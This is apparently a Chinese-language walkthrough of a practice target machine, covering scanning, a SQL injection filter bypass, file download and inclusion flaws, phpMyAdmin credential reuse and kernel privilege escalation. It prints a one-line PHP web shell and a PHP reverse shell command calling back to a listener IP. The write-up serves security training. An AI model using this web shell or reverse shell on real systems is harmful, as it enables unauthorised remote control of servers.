靶机练习--5
目录
主机发现
端口扫描
端口服务版本,操作系统扫描
22 ssh可尝试暴力破解
apache可查询其版本漏洞
?
web端开找
一个登陆点?
?
尝试弱口令,万能密码sql注入
?看起来是把我的单引号过滤了
?
?
目录扫描
找找有用的
这有一个文件上传,但是貌似不知道上传到哪里了
这里直接有一个phpinfo
?暴露了其绝对路径
?允许本地文件包含
?这个页面,让我们输入文件路径,可能有文件包含漏洞?
?
包含一下,发现没有效果
?
试试post传参
结果触发了一个下载,存在任意文件下载漏洞
?抓包能直接看
包含一下刚才扫出来的空白页,发现可以找到一个用户名密码
在这个登陆点试试,发现登不上去
ssh也连不上去。。。没有登陆点了呀
换个大字典再扫一遍目录
访问看看
phpmyadmin
发现了一个phpmyadmin的后台登陆页面
刚好有个账户密码不知道在哪试
?登陆成功
然后在这里面也找到了一个用户名密码
把这个在网站主页试试
登上来一个新页面?
看看有啥有用的,这里貌似是一个图片保存库,还可以上传
查看其源码,发现其存在文件包含
continue以后,会以post接受一个load,然后再去包含?
?
?
?这里我们可以看到有图片路径
上传一个图片马,命令执行代码来配合文件包含
<?php system($_GET[cmd]); ?>
?
?
再来到这个首页抓包
抓那个continue的包
?
修改load里去包含存在命令执行脚本的图片(文件包含时会优先执行里面的代码,不用管后缀)
上面直接添加get参数,去传参执行命令
getshell
此时,可以尝试反弹shell
php -r '$sock=fsockopen("192.168.129.129",1234);exec("/bin/sh -i <&3 >&3 2>&3");'?将上面的代码进行url编码后,传给cmd,去执行命令
?kali这里提前监听,至此,getshell
提权
搜索内核版本漏洞?
37292.c 本地提权
将其复制到apache根目录,让靶机远程下载
下载,编译,运行?
提权成功
附加
1.在phpmyadmin默认配置里找到root的密码
其实还可以去包含很多东西,进行代码审计
在网上可以找到,phpmyadmin的配置文件,默认在 /var/www/phpmy/config.inc.php
这里就爆出了系统root用户的密码
2.通过代码审计来绕过主页sql注入的限制
?uname和pass传进去的值通过urldecode编码之后,将字符中的\’替换成空格
在使用普通的万能密码 'or 1=1# 时,他登不上去
?
但是在里面加入 \' 时,都可以进行绕过
?
?
总结
- 在找到用户名&密码时,可以对其每个登陆点都试试,有人懒得记密码,全网都是一个密码
- 遇到文件包含时,可以去包含所有敏感文件及扫出来的东西,进行代码审计,信息收集是关键
- 同时有文件上传+文件包含,基本就可以getshell了